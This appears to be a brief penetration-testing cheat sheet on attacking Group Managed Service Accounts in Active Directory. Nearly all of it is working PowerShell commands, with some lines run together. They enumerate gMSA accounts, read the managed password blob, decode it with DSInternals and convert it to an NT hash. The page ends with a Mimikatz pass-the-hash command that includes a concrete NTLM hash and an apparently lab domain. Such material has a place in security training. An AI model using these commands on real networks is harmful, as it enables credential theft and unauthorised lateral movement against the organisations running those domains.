gmsa
Powershell
Get-DomainObject -LDAPFilter '(objectClass=msDS-GroupManagedServiceAccount)'
Get-ADServiceAccount -Filter *Get-ADServiceAccount -Identity gmsa_account -Properties * | select PrincipalsAllowedToRetrieveManagedPassword$Passwordblob = (Get-ADServiceAccount -Identity jumpone -Properties msDS-ManagedPassword).'msDS-ManagedPassword'Import-Module \DSInternals\DSInternals.psd1
$decodedpwd = ConvertFrom-ADManagedPasswordBlob $Passwordblob
ConvertTo-NTHash -Password $decodedpwd.SecureCurrentPasswordsekurlsa::pth /user:jumpone /domain:us.techcorp.local /ntlm:0a02c684cc0fa1744195edd1aec43078Last updated